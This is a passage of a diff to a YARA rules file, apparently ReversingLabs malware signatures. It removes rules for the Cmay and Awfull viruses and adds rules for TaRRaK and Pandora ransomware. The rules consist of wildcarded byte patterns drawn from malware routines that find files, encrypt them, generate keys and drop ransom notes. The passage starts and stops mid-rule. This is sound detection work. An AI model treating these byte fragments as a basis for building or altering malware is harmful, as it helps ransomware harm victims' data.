+            CE E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0
+            0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D3 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 84 C0
+            0F 84 ?? ?? ?? ?? 55 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D
+            44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B E8
+            83 FD ?? 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8B 44
+            24 ?? 83 E0 ?? 74 ?? F6 84 24 ?? ?? ?? ?? ?? 75 ?? 85 C0 75 ?? F6 84 24 ?? ?? ?? ??
+            ?? 74 ?? 33 F6 85 FF 74 ?? 8B 44 24 ?? FF 34 B0 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85
+            C0 75 ?? 46 3B F7 72 ?? EB ?? FF B4 24 ?? ?? ?? ?? 8D 44 24 ?? 50 53 FF 94 24 ?? ??
+            ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 74 ?? FF B4 24 ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 8B 74 24 ?? F6 44 24 ?? ?? 74 ?? F6 84 24 ?? ?? ?? ?? ?? 74
+            ?? 8D 44 24 ?? 50 8B D3 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 84 C0 74 ?? 83 BC 24
+            ?? ?? ?? ?? ?? 74 ?? FF B4 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 8B
+            D6 FF B4 24 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ??
+            ?? FF B4 24 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 55 FF 15 ?? ?? ??
+            ?? 85 C0 0F 85 ?? ?? ?? ?? EB ?? 83 64 24 ?? ?? 55 FF 15 ?? ?? ?? ?? 5D 5F 5E 5B 81
+            C4 ?? ?? ?? ?? C3
+        }
+		$find_files_2 = {
+            81 EC ?? ?? ?? ?? 8D 44 24 ?? 53 55 56 68 ?? ?? ?? ?? 50 8B D9 FF 15 ?? ?? ?? ?? 8B
+            F0 85 F6 0F 84 ?? ?? ?? ?? 8D 6C 24 ?? 8D 6C 75 ?? 33 C0 66 89 44 74 ?? 68 ?? ?? ??
+            ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 59 E8 ?? ?? ?? ?? 83 C0 ?? 6A ?? 59 66 89
+            45 ?? E8 ?? ?? ?? ?? 83 C0 ?? 66 89 44 74 ?? 8D 84 24 ?? ?? ?? ?? 50 8D 44 24 ?? 50
+            FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 84 C0 74 ?? 8D 84 24 ?? ?? ?? ?? 50 55 FF 15 ?? ?? ?? ?? 83 64 24 ?? ?? 8D 44
+            24 ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 53
+            FF 15 ?? ?? ?? ?? 5E 5D 5B 81 C4 ?? ?? ?? ?? C3
+        }
+		$find_files_3 = {
+            81 EC ?? ?? ?? ?? 53 55 56 8B D9 57 8B FA 85 DB 74 ?? 33 D2 E8 ?? ?? ?? ?? 8B F0 85
+            F6 0F 84 ?? ?? ?? ?? 57 56 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
+            83 C4 ?? 8B CE E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 C6 43 ?? ?? FF 15 ?? ?? ?? ??
+            0D ?? ?? ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24
+            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? EB ?? 57 FF 15 ?? ?? ?? ?? 0D ?? ?? ?? ?? 50 57 FF
+            15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D7 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 84 C0 0F
+            84 ?? ?? ?? ?? 8B B4 24 ?? ?? ?? ?? 80 7E ?? ?? 75 ?? 8B 15 ?? ?? ?? ?? 8D 8C 24 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? 8B E8 83 FD ?? 0F 84 ?? ?? ?? ?? 83 64 24 ?? ?? 6A ?? FF 35 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 84 C0
+            0F 85 ?? ?? ?? ?? F7 44 24 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 83 7C 24 ?? ?? 75 ?? 56
+            57 FF 15 ?? ?? ?? ?? 50 8B D7 8B CB E8 ?? ?? ?? ?? 59 59 89 44 24 ?? 85 C0 0F 84 ??
+            ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 50 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? F6 44
+            24 ?? ?? 74 ?? 80 7E ?? ?? 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 56 FF B4 24 ??
+            ?? ?? ?? 8D 54 24 ?? E8 ?? ?? ?? ?? 59 59 EB ?? 80 7E ?? ?? 74 ?? 85 DB 74 ?? 83 7C
+            24 ?? ?? 7C ?? 7F ?? 81 7C 24 ?? ?? ?? ?? ?? 72 ?? 80 3E ?? 74 ?? 6A ?? 8D 44 24 ??
+            50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 8D 44 24 ?? 50 FF 74 24 ?? FF 94 24 ?? ?? ?? ??
+            83 C4 ?? 85 C0 74 ?? 8D 44 24 ?? 50 55 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 55
+            FF 15 ?? ?? ?? ?? 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C3
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $enumerate_physical_drives and $corrupt_drive_thread )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_* ) ) and ( all of ( $encrypt_files_* ) )
 }
-
-rule REVERSINGLABS_Win32_Virus_Cmay : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Tarrak : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects Cmay virus."
+		description = "Yara rule that detects TaRRaK ransomware."
 		author = "ReversingLabs"
-		id = "d61e09f1-1d3f-5e1e-9884-25f1a465e88d"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "a783df87-0c9b-5868-9af0-c32b11e8b71b"
+		date = "2021-09-06"
+		modified = "2021-09-06"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/virus/Win32.Virus.Cmay.yara#L3-L73"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.TaRRaK.yara#L1-L96"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f3bdf772eb80c632a913621732d12ae4a02bc7d3ba41f51711aa329be2ca6220"
+		logic_hash = "a8c4c4a501d94da94ae4a2e1eb2846e841249659be64dd45f46584885d000635"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Virus"
-		tc_detection_name = "Cmay"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "TaRRaK"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$cmay_body_1 = {
-            60 66 9C E8 00 00 00 00 5D 8B C5 81 ED ?? ?? ?? ?? 2D 08 00 00 00 2D
-            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 3A 02 00 00 0F 82 7C 03 00 00 8D B5
-            ?? ?? ?? ?? 8D BD ?? ?? ?? ?? E8 4F 02 00 00 E8 05 00 00 00 E9 61 03
-            00 00 8D BD ?? ?? ?? ?? C6 85 ?? ?? ?? ?? 03 6A 7F 57 FF 95 ?? ?? ??
-            ?? 83 C7 7F 6A 7F 57 FF 95 ?? ?? ?? ?? 83 C7 7F 57 6A 7F FF 95 ?? ??
-            ?? ?? 8D BD ?? ?? ?? ?? 80 BD ?? ?? ?? ?? 00 0F 84 20 03 00 00 FE 8D
-            ?? ?? ?? ?? 57 FF 95 ?? ?? ?? ?? 83 C7 7F 8D 9D ?? ?? ?? ?? 53 8D 9D
-            ?? ?? ?? ?? 53 FF 95 ?? ?? ?? ?? 83 F8 FF 74 CA 89 85 ?? ?? ?? ?? FF
-            85 ?? ?? ?? ?? E8 C0 02 00 00 83 F8 FF 74 75 E8 70 02 00 00 85 C0 74
-            6C 8B 85 ?? ?? ?? ?? 8B 50 3C 3B 95 ?? ?? ?? ?? 73 5B 03 D0 8B 02 35
-            96 23 00 00 3D C6 66 00 00 75 4B 81 7A 4C 53 54 30 00 74 42 52 FF B5
-            ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 5A FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ??
-            E8 79 00 00 00 8F 85 ?? ?? ?? ?? 8F 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ??
-            05 7E 0E 80 BD ?? ?? ?? ?? 00 0F 85 40 FF FF FF C3 57 8D BD ?? ?? ??
-            ?? B9 04 01 00 00 32 C0 F3 AA 5F FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ??
-            FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? ?? ??
-            ?? 8D 9D ?? ?? ?? ?? 53 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 85 C0 74
-            05 E9 2A FF FF FF E9 E9 FE FF FF 8B B5 ?? ?? ?? ?? 81 C6 ?? ?? ?? ??
-            8B 5A 3C E8 87 01 00 00 89 B5 ?? ?? ?? ?? E8 8B 01 00 00 33 DB 8B 95
-            ?? ?? ?? ?? 8B 42 3C 03 D0 0F B7 42 06 48 6B C0 28 0F B7 5A 14 83 C3
-            18 03 DA 03 C3 8B 58 10 03 58 14 03 9D ?? ?? ?? ?? 53 8B 4A 28 89 8D
-            ?? ?? ?? ?? 8B 4A 34 89 8D ?? ?? ?? ?? 8B 48 0C 03 48 10 89 8D ?? ??
-            ?? ?? 89 4A 28 8B 70 10 81 C6 ?? ?? ?? ?? 8B 5A 3C E8 1D 01 00 00 89
-            70 10 89 70 08 03 70 0C 89 72 50 81 48 24 20 00 00 A0 C7 42 4C 53 54
+		$encrypt_files_p1 = {
+            03 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 06 07 9A 0C 73 ?? ?? ?? ?? 0D 09 08 28 ?? ?? ?? ?? 7D
+            ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 09 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ??
+            02 08 28 ?? ?? ?? ?? 07 17 58 0B 07 06 8E 69 32 ?? DE ?? 26 DE ?? 00 03 28 ?? ?? ?? ??
+            0A 16 0B 2B ?? 06 07 9A 13 ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ??
+            6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 02 11 ?? 28 ?? ?? ?? ??
+            07 17 58 0B 07 06 8E 69 32 ?? DE ?? 26 DE ?? 2A
         }
-		$cmay_body_2 = {
-            30 00 5B B9 ?? ?? ?? ?? FC 8B FB 8D B5 ?? ?? ?? ?? F3 A4 FF B5 ?? ??
-            ?? ?? FF 95 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? FF B5 ??
-            ?? ?? ?? FF 95 ?? ?? ?? ?? C3 50 51 B9 05 00 00 00 8B 44 24 2E 25 00
-            00 FF FF 66 81 38 4D 5A 74 09 2D 00 00 01 00 E2 F2 EB 06 89 85 ?? ??
-            ?? ?? 59 58 74 01 F9 C3 56 8B 95 ?? ?? ?? ?? 8B 72 3C 03 F2 8B 76 78
-            03 F2 83 C6 1C AD 03 C2 89 85 ?? ?? ?? ?? AD 03 C2 89 85 ?? ?? ?? ??
-            AD 03 C2 89 85 ?? ?? ?? ?? 5E 57 E8 16 00 00 00 5F 89 07 83 C7 04 80
-            3E 88 C7 85 ?? ?? ?? ?? 00 00 00 00 75 E5 C3 8B DE 80 3E 00 74 03 46
-            EB F8 46 8B CE 2B CB 8B F3 8B BD ?? ?? ?? ?? 57 8B 3F 03 FA 51 F3 A6
-            74 0F 8B F3 59 5F 83 C7 04 FF 85 ?? ?? ?? ?? EB E7 59 5F 8B 85 ?? ??
-            ?? ?? D1 E0 03 85 ?? ?? ?? ?? 33 DB 66 8B 18 C1 E3 02 03 9D ?? ?? ??
-            ?? 8B 1B 03 DA 8B C3 C3 50 52 33 D2 8B C6 F7 F3 2B DA 03 F3 5A 58 C3
-            8B 85 ?? ?? ?? ?? 6A 00 50 6A 00 6A 04 6A 00 FF B5 ?? ?? ?? ?? FF 95
-            ?? ?? ?? ?? 85 C0 74 1E 89 85 ?? ?? ?? ?? 6A 00 6A 00 6A 00 6A 02 FF
-            B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 85 C0 75 02 33 C0 89 85 ?? ?? ?? ??
-            C3 33 C0 50 68 80 00 00 00 6A 03 50 40 50 68 00 00 00 C0 8D B5 ?? ??
-            ?? ?? 56 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C3 85 ED 0F 84 2A 04 00
-            00 33 C0 05 ?? ?? ?? ?? 05 ?? ?? ?? ?? FF E0
+		$encrypt_files_p2 = {
+            03 8E 69 17 59 0A 06 17 2F ?? 03 2A 03 06 95 0B 16 0D 1C 1F ?? 06 17 58 5B 58 13 ?? 2B
+            ?? 09 20 ?? ?? ?? ?? 58 0D 09 18 64 19 5F 13 ?? 16 13 ?? 2B ?? 03 11 ?? 17 58 95 0C 03
+            11 ?? 8F ?? ?? ?? ?? 25 4B 02 09 08 07 11 ?? 11 ?? 04 28 ?? ?? ?? ?? 58 25 13 ?? 54 11
+            ?? 0B 11 ?? 17 58 13 ?? 11 ?? 06 32 ?? 03 16 95 0C 03 06 8F ?? ?? ?? ?? 25 4B 02 09 08
+            07 11 ?? 11 ?? 04 28 ?? ?? ?? ?? 58 25 13 ?? 54 11 ?? 0B 16 11 ?? 25 17 59 13 ?? 32 ??
+            03 2A
+        }
+		$encrypt_files_p3 = {
+            05 1B 64 04 18 62 61 04 19 64 05 1A 62 61 58 03 04 61 0E ?? 0E ?? 19 5F 6A 0E ?? 6E 61
+            D4 95 05 61 58 61 2A
+        }
+		$encrypt_files_p4 = {
+            03 8E 2D ?? 03 2A 02 02 02 03 17 28 ?? ?? ?? ?? 02 02 7B ?? ?? ?? ?? 16 28 ?? ?? ?? ??
+            28 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 2A
+        }
+		$find_files_p1 = {
+            73 ?? ?? ?? ?? 25 02 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25
+            2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 2A
+        }
+		$find_files_p2 = {
+            73 ?? ?? ?? ?? 25 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 1B 28 ?? ?? ?? ?? 6F ?? ?? ??
+            ?? 25 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 1F
+            ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2A
+        }
+		$change_desktop = {
+            1F ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 06 28 ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 17
+            8C ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 8C ?? ?? ?? ?? 6F ?? ?? ?? ?? 1F ?? 16
+            06 19 28 ?? ?? ?? ?? 26 DE ?? 26 DE ?? 2A
+        }
+		$drop_ransom_note = {
+            02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 2A 00 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 02 7B ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 0D 12 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ??
+            ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 07 06 6F ?? ?? ?? ?? 26 07 6F ??
+            ?? ?? ?? 26 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ??
+            2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 07 11 ?? 6F ?? ?? ?? ?? 26 12 ?? 28 ?? ?? ?? ?? 2D ??
+            DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 07 6F ?? ?? ?? ?? 0C 02 28 ?? ?? ?? ??
+            6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 02 7B ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 06 28 ?? ?? ?? ?? 11 ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 28 ?? ?? ?? ?? DE ??
+            26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC DE ?? 26
+            DE ?? 2A
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $cmay_body_1 at pe.entry_point ) and $cmay_body_2
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $change_desktop ) and ( $drop_ransom_note )
 }
-
-rule REVERSINGLABS_Win32_Virus_Awfull : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win64_Ransomware_Pandora : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects Awfull virus."
+		description = "Yara rule that detects Pandora ransomware."
 		author = "ReversingLabs"
-		id = "34104923-b401-5d39-883b-aa9a5a8e64f3"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "18182bbe-1678-5d0b-a7ee-80c4bbaee99e"
+		date = "2022-06-01"
+		modified = "2022-06-01"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/virus/Win32.Virus.Awfull.yara#L3-L33"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.Pandora.yara#L1-L95"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "84a4faee4cbbb3387ad25bd9230c6482b8db461bc008312bc782f23e3df2eae3"
+		logic_hash = "6576bde36ae9a9bc2e9dd878db788c608083b84d96d31e6898f48a264c6b7f1a"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Virus"
-		tc_detection_name = "Awfull"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Pandora"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$awfull_body = {
-              60 E8 ?? 00 00 00 8B 64 24 08 EB ?? [0-256]
-              33 D2 64 FF 32 64 89 22 33 C0 C7 00 00 00 00 00 33 D2 64 8F 02
-              5A 64 (8B 0D | 67 8B 0E ) 14 00 [0-2] E3 03 FA
-              EB FD 61 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 0B ED 74 ??
-              [0-128] (BE | 8B 35) ?? ?? ?? ?? 03 F5 B9 ?? ?? ?? ??
-              56 5F AC F6 D0 AA 49 E3 02 EB F7
+		$find_files_p1 = {
+            41 57 41 56 41 55 41 54 56 57 55 53 48 83 EC ?? 48 89 4C 24 ?? C7 44 24 ?? ?? ?? ??
+            ?? 45 31 F6 41 BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8B 0D ?? ?? ??
+            ?? 48 89 4C 24 ?? 45 31 C0 41 81 FA ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 0F
+            4C CA 41 0F 94 C0 48 8B 8C 08 ?? ?? ?? ?? 48 01 F1 31 D2 31 DB 41 81 FA ?? ?? ?? ??
+            0F 9C C2 0F 95 C3 41 BD ?? ?? ?? ?? 49 29 D5 41 81 FA ?? ?? ?? ?? BF ?? ?? ?? ?? BA
+            ?? ?? ?? ?? 48 0F 4C FA 4C 8D 4C 9B ?? 41 BB ?? ?? ?? ?? BA ?? ?? ?? ?? 4C 0F 44 DA
+            49 83 C8 ?? 31 DB 31 D2 41 81 FA ?? ?? ?? ?? 0F 9C C3 4C 8D 64 1B ?? 0F 94 C2 48 83
+            F2 ?? 31 DB 41 81 FA ?? ?? ?? ?? 0F 94 C3 48 8D 1C DB 48 83 C3 ?? EB ?? 0F 1F 40 ??
+            4A 8B AC C0 ?? ?? ?? ?? 48 01 F5 FF E5 FF E1 4A 8B AC E0 ?? ?? ?? ?? 48 01 F5 FF E5
+            48 8B AC D8 ?? ?? ?? ?? 48 01 F5 FF E5 0F 1F 80 ?? ?? ?? ?? 48 8B AC F8 ?? ?? ?? ??
+            48 01 F5 FF E5 4A 8B AC E8 ?? ?? ?? ?? 48 01 F5 FF E5 4A 8B AC D8 ?? ?? ?? ?? 48 01
+        }
+		$find_files_p2 = {
+            F5 FF E5 66 0F 1F 84 00 ?? ?? 00 00 48 8B AC D0 ?? ?? ?? ?? 48 01 F5 FF E5 4A 8B AC
+            C8 ?? ?? ?? ?? 48 01 F5 FF E5 44 89 74 24 ?? 48 63 4C 24 ?? 48 8B 54 24 ?? 48 8B 8C
+            CA ?? ?? ?? ?? 48 89 4C 24 ?? 48 8B 4C 24 ?? 8B 54 24 ?? BD ?? ?? ?? ?? 01 EA 44 8B
+            54 24 ?? BD ?? ?? ?? ?? 41 01 EA 66 83 39 ?? 44 0F 45 D2 E9 ?? ?? ?? ?? 45 31 FF EB
+            ?? 66 2E 0F 1F 84 00 ?? ?? 00 00 90 41 BF ?? ?? ?? ?? 44 8B 54 24 ?? 41 81 C2 ?? ??
+            ?? ?? E9 ?? ?? ?? ?? 66 0F 1F 84 00 ?? ?? 00 00 44 8B 74 24 ?? 41 83 C6 ?? 48 8B 54
+            24 ?? 48 8B 05 ?? ?? ?? ?? 48 8B 80 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 01 C8 48 8B 4C 24
+            ?? FF D0 8B 4C 24 ?? BA ?? ?? ?? ?? 01 D1 44 8B 54 24 ?? BA ?? ?? ?? ?? 41 01 D2 85
+            C0 44 0F 44 D1 E9 ?? ?? ?? ?? 44 89 F8 48 83 C4 ?? 5B 5D 5F 5E 41 5C 41 5D 41 5E 41
+            5F C3
+        }
+		$generate_key = {
+            41 57 41 56 41 55 41 54 56 57 55 53 48 81 EC ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48
+            8D B4 24 ?? ?? ?? ?? 48 89 74 24 ?? 48 8B 44 24 ?? 48 8B 05 ?? ?? ?? ?? 48 C7 C5 ??
+            ?? ?? ?? 48 8B 80 ?? ?? ?? ?? 48 01 E8 41 BC ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 4C 01
+            E1 BA ?? ?? ?? ?? 48 03 15 ?? ?? ?? ?? FF D0 48 8B 05 ?? ?? ?? ?? 48 8B 4C 24 ?? 0F
+            B7 90 ?? ?? ?? ?? 66 89 51 ?? 48 8B 80 ?? ?? ?? ?? 48 89 01 48 8B 05 ?? ?? ?? ?? 48
+            8B 80 ?? ?? ?? ?? 48 01 E8 48 8B 0D ?? ?? ?? ?? 4C 01 E1 FF D0 48 8B 05 ?? ?? ?? ??
+            48 8B 80 ?? ?? ?? ?? 48 01 E8 48 8B 0D ?? ?? ?? ?? 4C 01 E1 FF D0 48 8B 05 ?? ?? ??
+            ?? 48 8B 80 ?? ?? ?? ?? 48 01 E8 48 89 F1 FF D0 48 98 4C 8B 05 ?? ?? ?? ?? 4D 01 E0
+            48 8B 0D ?? ?? ?? ?? 48 8B 99 ?? ?? ?? ?? 48 01 EB 48 8B 0D ?? ?? ?? ?? 4C 01 E1 48
+            89 44 24 ?? 48 8D 15 ?? ?? ?? ?? 49 89 F1 FF D3 89 84 24 ?? ?? ?? ?? B9 ?? ?? ?? ??
+            45 31 ED 41 BE ?? ?? ?? ?? 41 BF ?? ?? ?? ?? BB ?? ?? ?? ?? EB ?? 81 F9 ?? ?? ?? ??
+            BA ?? ?? ?? ?? BF ?? ?? ?? ?? 48 0F 44 D7 48 8B 04 10 4C 01 F0 FF E0
+        }
+		$drop_ransom_note = {
+            48 8B 05 ?? ?? ?? ?? 48 8B 80 ?? ?? ?? ?? BD ?? ?? ?? ?? 48 01 E8 48 8B 0D ?? ?? ??
+            ?? BE ?? ?? ?? ?? 48 01 F1 48 8B 15 ?? ?? ?? ?? BF ?? ?? ?? ?? 48 01 FA FF D0 48 8B
+            0D ?? ?? ?? ?? 48 01 F1 48 8B 05 ?? ?? ?? ?? 48 8B 90 ?? ?? ?? ?? 48 01 EA FF D2 48
+            8B 15 ?? ?? ?? ?? 48 01 F2 48 8B 8C 24 ?? ?? ?? ?? 48 8B 35 ?? ?? ?? ?? 48 8B B6 ??
+            ?? ?? ?? 48 01 EE 48 C7 44 24 ?? ?? ?? ?? ?? 41 89 C0 4C 8D 4C 24 ?? FF D6 BE ?? ??
+            ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 8B 90 ?? ?? ?? ?? 41 BE ?? ??
+            ?? ?? 48 01 EA FF D2 BF ?? ?? ?? ?? 8B 4C 24 ?? B8 ?? ?? ?? ?? 01 C1 E9 ?? ?? ?? ??
+            81 F9 ?? ?? ?? ?? BA ?? ?? ?? ?? BD ?? ?? ?? ?? 48 0F 44 D5 48 8B 04 10 4C 01 E0 FF
+            E0 8B 44 24 ?? 83 C0 ?? 89 44 24 ?? 8B 4C 24 ?? B8 ?? ?? ?? ?? 01 C1 E9 ?? ?? ?? ??
+            81 F9 ?? ?? ?? ?? BA ?? ?? ?? ?? BD ?? ?? ?? ?? 48 0F 44 D5 48 8B 04 10 4C 01 E0 FF
+            E0 8B 4C 24 ?? B8 ?? ?? ?? ?? 01 C1 E9 ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? BA ?? ?? ?? ??
+            BD ?? ?? ?? ?? 48 0F 44 D5 48 8B 04 10 4C 01 E0 FF E0 8B 4C 24 ?? B8 ?? ?? ?? ?? 01
+            C1 C7 44 24 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? BA ?? ?? ?? ?? BD ?? ??
+            ?? ?? 48 0F 44 D5 48 8B 04 10 4C 01 E0 FF E0 48 8B 05 ?? ?? ?? ?? 48 8B 88 ?? ?? ??
+            ?? 48 8B 05 ?? ?? ?? ?? 48 8B 80 ?? ?? ?? ?? 4C 01 F0 C7 44 24 ?? ?? ?? ?? ?? 48 8D
+            54 24 ?? 4C 8D 84 24 ?? ?? ?? ?? 4C 8D 4C 24 ?? FF D0 BF ?? ?? ?? ?? 8B 54 24 ?? B9
